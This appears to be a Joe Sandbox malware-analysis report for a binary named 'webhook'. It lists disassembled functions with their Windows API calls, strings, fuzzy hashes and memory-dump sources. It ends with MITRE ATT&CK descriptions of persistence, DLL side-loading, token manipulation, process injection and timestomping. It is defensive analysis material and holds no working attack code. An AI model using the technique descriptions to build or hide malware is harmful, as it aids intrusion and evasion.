Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 6bf25506a061de764c46ff11c3dabc26361253386e945ff23246536f7576ff98
Instruction ID: fcb105badbbaaf9fda59c4812ce5661def20b7ff700197e6c7d785667f0fac65
Opcode Fuzzy Hash: 6bf25506a061de764c46ff11c3dabc26361253386e945ff23246536f7576ff98
Instruction Fuzzy Hash: 48318D36B24602AAE7108B75E9059FD7BA1F789B99F585130CE4AA3B54CF38E445CB00

Function 00007FF650547BB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547BEF
LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547BFE
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C4E
FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C82
FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544FA3), ref: 00007FF650547C9B

Strings

UPDFILE%lu, xrefs: 00007FF650547C5F

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$Free$FindLoadLock
String ID: UPDFILE%lu
API String ID: 3629466761-2329316264
Opcode ID: d41cb9711b44c5778f8d685044e0478faac0a7e9c0355c6fd43fe1abdcbe4688
Instruction ID: 1c0dc0ae4de1f962f1b9ac9256cad3c04af824513e922cbf15447dd4c3a83f5f
Opcode Fuzzy Hash: d41cb9711b44c5778f8d685044e0478faac0a7e9c0355c6fd43fe1abdcbe4688
Instruction Fuzzy Hash: 8B319132A08B47E6E7108B25A6011F9BBA0FF89B90F594631EA9E93790CF3CE414C600

Function 00007FF650543044 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32 ref: 00007FF650543071
WritePrivateProfileStringA.KERNEL32 ref: 00007FF6505430A0
_lopen.KERNEL32 ref: 00007FF6505430B4
_llseek.KERNEL32 ref: 00007FF6505430CF
_lclose.KERNEL32 ref: 00007FF6505430DF

Strings

wininit.ini, xrefs: 00007FF650543081

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 9400fdb6d7a44d6df7f18705ef269f017eb9ad4388b642ce147a901e5ae05de9
Instruction ID: 80d88a3c0834d05c4920fba23c7f5a91f55768315c8554d3b948fa4be94c6084
Opcode Fuzzy Hash: 9400fdb6d7a44d6df7f18705ef269f017eb9ad4388b642ce147a901e5ae05de9
Instruction Fuzzy Hash: 40114236708A82B7E7208B25E5552FA77A1FBCD714F898231DA8E93764DF3CD519CA00

Function 00007FF650544E34 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF65054498A), ref: 00007FF650544E5D
LocalFree.KERNEL32(?,?,?,?,00000000,00007FF65054498A), ref: 00007FF650544EF9

Part of subcall function 00007FF6505461E8: LoadStringA.USER32 ref: 00007FF650546278
Part of subcall function 00007FF6505461E8: MessageBoxA.USER32 ref: 00007FF6505462B8

Strings

<None>, xrefs: 00007FF650544EBD
FINISHMSG, xrefs: 00007FF650544E41, 00007FF650544E94
@, xrefs: 00007FF650544EDF

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$@$FINISHMSG
API String ID: 3507850446-4126004490
Opcode ID: f92227409698a50e80f775f4930689cd1eb965909ec3739b70e23f449fe7515b
Instruction ID: d247be8d790619eaafed59fd9299357eb12152ce4db259c32bf4167b4a75e15d
Opcode Fuzzy Hash: f92227409698a50e80f775f4930689cd1eb965909ec3739b70e23f449fe7515b
Instruction Fuzzy Hash: 5E119D72A08343B3F7208B21E5117FA6690EB89785F489134DA8E96B89EF3CD1248B00

Function 00007FF6505465B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF650546630
LoadLibraryExA.KERNEL32 ref: 00007FF650546650
LoadLibraryA.KERNEL32 ref: 00007FF650546665

Strings

advpack.dll, xrefs: 00007FF650546613, 00007FF65054665E
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6505465D6

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-3680919256
Opcode ID: 963a3f96620efcd57751c6ee7ade2dcdaa22df72e3894113d12d29ba1fba980a
Instruction ID: 09fd482c2771bb23568de4693daea2b8743d71994d9a66568396476e702124fd
Opcode Fuzzy Hash: 963a3f96620efcd57751c6ee7ade2dcdaa22df72e3894113d12d29ba1fba980a
Instruction Fuzzy Hash: BF116071A18A87B6EE618B10E5513F877A0FB99B04F894232C6CD92791DF3CE529C700

Function 00007FF6505436EE Relevance: 7.6, APIs: 5, Instructions: 52windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF65054373A
GetDesktopWindow.USER32 ref: 00007FF650543748
LoadStringA.USER32 ref: 00007FF650543778
SetDlgItemTextA.USER32 ref: 00007FF650543791
MessageBeep.USER32 ref: 00007FF6505437A0

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 65e6fbf51a895507969a40468058746c97c4b6aea9fe2f97e498a7505ce86659
Instruction ID: 1c76fec543df12a7001ee32322942ae985b3104169acb440a89b6efff39bf393
Opcode Fuzzy Hash: 65e6fbf51a895507969a40468058746c97c4b6aea9fe2f97e498a7505ce86659
Instruction Fuzzy Hash: 9A215E71A08687B6EB604B21A5593F96660FB89B84F584130CACE96795CF3CD125C740

Function 00007FF65054669E Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF6505466EC
SetWindowTextA.USER32 ref: 00007FF65054670D
SetDlgItemTextA.USER32 ref: 00007FF650546728
SetForegroundWindow.USER32 ref: 00007FF650546737
EndDialog.USER32 ref: 00007FF65054674A

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Window$Text$DesktopDialogForegroundItem
String ID:
API String ID: 761066910-0
Opcode ID: d27efb2bfb772949979602fae28f15f48041aa30681c92464f837cb170850190
Instruction ID: b4757954f550a53c0185688398bebed30b3b56246013a0a7daae9ce104c6ca03
Opcode Fuzzy Hash: d27efb2bfb772949979602fae28f15f48041aa30681c92464f837cb170850190
Instruction Fuzzy Hash: 4F115E74A08603F6FA554B65E6083F86A51EF8AB45F5D9030C98EA6394DF3CE468C601

Function 00007FF650546E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF650546EFB
WriteFile.KERNEL32 ref: 00007FF650546F32
CloseHandle.KERNEL32 ref: 00007FF650546F57

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF650546E82

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-305352358
Opcode ID: 0e03046e849406695a98d42d2011d6eb0c047299338339c8bc95bd8c917e975f
Instruction ID: 738c585d0f782fcb36dd8e90f7ce9a0b0edf9dd244149d3026ee2f7e29efaded
Opcode Fuzzy Hash: 0e03046e849406695a98d42d2011d6eb0c047299338339c8bc95bd8c917e975f
Instruction Fuzzy Hash: AF317E32608A82B6EB608F10E5447FAB7A0FB89B94F484235DA9D97784CF7CD418CB00

Function 00007FF650547E28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

#20.CABINET ref: 00007FF650547EA1
#21.CABINET ref: 00007FF650547EE0
#23.CABINET ref: 00007FF650547F1A

Strings

*MEMCAB, xrefs: 00007FF650547EBA

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID:
String ID: *MEMCAB
API String ID: 0-3211172518
Opcode ID: d326e7aa94b67cf4d4d3d0379e3d5024a1c04b5e8baa646fa99e55709f362e69
Instruction ID: 99ba8c43d9acb45b0425dcf5783f5784d521c8c46c5a62303cb08b03c7c515b1
Opcode Fuzzy Hash: d326e7aa94b67cf4d4d3d0379e3d5024a1c04b5e8baa646fa99e55709f362e69
Instruction Fuzzy Hash: 32313831A19B47B5EA509B20E6443FD73A0FB44790F584236D99DA2790EF3CE4A9C740

Function 00007FF650542F8C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF65054358D), ref: 00007FF650542FBD
RegQueryInfoKeyA.ADVAPI32 ref: 00007FF650543007
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00000000,00007FF65054358D), ref: 00007FF650543025

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF650542FAF

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CloseInfoOpenQuery
String ID: System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2142960691-1430103811
Opcode ID: 47349caa1c797a3ce88789d8bb3edd23980ba6ecef902e538d3c134507dba548
Instruction ID: 9b5bf13874131b7b22a6403284692c07e6aef98731efd70aeeaad7b6da43b058
Opcode Fuzzy Hash: 47349caa1c797a3ce88789d8bb3edd23980ba6ecef902e538d3c134507dba548
Instruction Fuzzy Hash: 9B11A732A18B8197E7108F65F44456AFBA5F789750B545229EBC983B28DF38D465CF00

Function 00007FF6505413E0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF650541453
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF650541472
RtlVirtualUnwind.KERNEL32 ref: 00007FF6505414BF
__raise_securityfailure.LIBCMT ref: 00007FF6505415A4

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 4f65c121b0890e46cb18bda7ebc0f2de684189390e2c9d24e6a7faa72a08dfdf
Instruction ID: b3ca3554e6546e6e6b69a060654236f357ad218fc54c1fa826e6257a642e54c7
Opcode Fuzzy Hash: 4f65c121b0890e46cb18bda7ebc0f2de684189390e2c9d24e6a7faa72a08dfdf
Instruction Fuzzy Hash: B641D839A09B02B1EB508B58F9903A577A4FB85784F584136D9CDE3764DF7CE465C700

Function 00007FF65054114B Relevance: 6.1, APIs: 4, Instructions: 72sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6505418E4: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF650541914
Part of subcall function 00007FF6505418E4: GetCurrentProcessId.KERNEL32 ref: 00007FF650541922
Part of subcall function 00007FF6505418E4: GetCurrentThreadId.KERNEL32 ref: 00007FF65054192E
Part of subcall function 00007FF6505418E4: GetTickCount.KERNEL32 ref: 00007FF65054193A
Part of subcall function 00007FF6505418E4: GetTickCount.KERNEL32 ref: 00007FF65054194A
Part of subcall function 00007FF6505418E4: QueryPerformanceCounter.KERNEL32 ref: 00007FF650541965

GetStartupInfoW.KERNEL32 ref: 00007FF650541185
_amsg_exit.MSVCRT ref: 00007FF6505411C0
Sleep.KERNEL32 ref: 00007FF6505411CF
_initterm.MSVCRT ref: 00007FF650541267
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF650541294
exit.MSVCRT ref: 00007FF650541330
_cexit.MSVCRT ref: 00007FF65054133F

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_inittermexit
String ID:
API String ID: 1267577977-0
Opcode ID: 67f1339d4cfeb4c52d404ce0f2d4713285857e4fe6d3d857e098854071e4ffab
Instruction ID: 4687a55540db4f4758ee0eb6fe9ddeb81bfa7f638456898d6e5335903af8a03e
Opcode Fuzzy Hash: 67f1339d4cfeb4c52d404ce0f2d4713285857e4fe6d3d857e098854071e4ffab
Instruction Fuzzy Hash: 2D312B35A0CA43B6E660DB21EA513F937A0EF85394F9C0435DACDE33A1DE6CE460C604

Function 00007FF65054143B Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF650541453
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF650541472
RtlVirtualUnwind.KERNEL32 ref: 00007FF6505414BF
__raise_securityfailure.LIBCMT ref: 00007FF6505415A4

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 0495dd60c7ced2f9c3233f3fe49d434584880a05317a0e056b8bda12f970aa15
Instruction ID: cd93906c57fef736c8ffc17951a3608bebfe2eaf8fa14041745b8873e402d201
Opcode Fuzzy Hash: 0495dd60c7ced2f9c3233f3fe49d434584880a05317a0e056b8bda12f970aa15
Instruction Fuzzy Hash: E331387960CB02A1EB508B58F5803A9BB64FBC8744F584136DACD93764DFBCD029C700

Function 00007FF6505464B0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF6505464DA
LoadResource.KERNEL32 ref: 00007FF6505464F1
DialogBoxIndirectParamA.USER32 ref: 00007FF650546527
FreeResource.KERNEL32 ref: 00007FF650546539

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: f84731171d3fff93161b8d11559f90ff40e31cde7bbef708dcb137f56a2588f9
Instruction ID: 4d72530afea39313971790356ba1e90f984d87f9eb056791de774bdce5cf21ae
Opcode Fuzzy Hash: f84731171d3fff93161b8d11559f90ff40e31cde7bbef708dcb137f56a2588f9
Instruction Fuzzy Hash: AD113031A09B42A6EA108F11F5042BABAA0FB9AFD0F4C4634DE9D57B98DF3CD014CB00

Function 00007FF650548914 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,00000000,00007FF650542AD5), ref: 00007FF650548938
CharPrevA.USER32(?,?,00000000,00007FF650542AD5), ref: 00007FF650548954
CharPrevA.USER32(?,?,00000000,00007FF650542AD5), ref: 00007FF650548978
CharNextA.USER32(?,?,00000000,00007FF650542AD5), ref: 00007FF65054898C

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 02f17945edf2851cb969e6e0e4490fbce2b65d3964085eb94fd71e724a66b365
Instruction ID: a7a2a58eae5cff40db9259c49f5724abe4e15a5c5b01ff5bb9b6f873eb54f229
Opcode Fuzzy Hash: 02f17945edf2851cb969e6e0e4490fbce2b65d3964085eb94fd71e724a66b365
Instruction Fuzzy Hash: 9F118D71908E82B5FB114B21A6042BDBB91BB4AFE0F5C5670DA9E93385DF2CD4558701

Function 00007FF6505415B8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6505415C3
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6505415E2
RtlVirtualUnwind.KERNEL32 ref: 00007FF65054162F
__raise_securityfailure.LIBCMT ref: 00007FF6505416A5

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 89b728313985ec8d8bc5760cebbad4f07023fb81a7c1741a44e0131cd2ee41d3
Instruction ID: 1c12d80f79d2a19837d4332bdedb14a00681649887de3a547bf12c55b680a60b
Opcode Fuzzy Hash: 89b728313985ec8d8bc5760cebbad4f07023fb81a7c1741a44e0131cd2ee41d3
Instruction Fuzzy Hash: DC21C039A08B46B1EB408F54F9803A97BA4FB85B44F580036DACDA3764DFBDE065C700

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

